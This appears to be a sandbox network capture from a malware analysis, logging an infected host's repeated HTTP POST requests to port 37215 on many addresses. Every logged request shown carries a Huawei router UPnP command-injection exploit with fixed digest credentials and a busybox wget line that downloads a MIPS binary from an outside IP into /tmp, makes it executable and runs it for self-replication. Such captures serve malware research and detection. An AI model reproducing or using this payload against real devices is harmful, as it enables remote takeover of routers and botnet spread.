                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          583192.168.2.2339386157.127.176.19637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.198276997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          584192.168.2.2355746157.117.17.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.212641001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          585192.168.2.233595441.62.137.24537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.212656975 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          586192.168.2.233899841.132.56.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.212661028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          587192.168.2.234355641.21.138.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.212668896 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          588192.168.2.2344952197.189.123.6337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.212717056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          589192.168.2.234230841.246.44.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.212723970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          590192.168.2.233777841.116.190.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.212735891 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          591192.168.2.236083680.180.200.17737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.212804079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          592192.168.2.234258441.185.191.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213274956 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          593192.168.2.2340790197.225.99.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213294983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
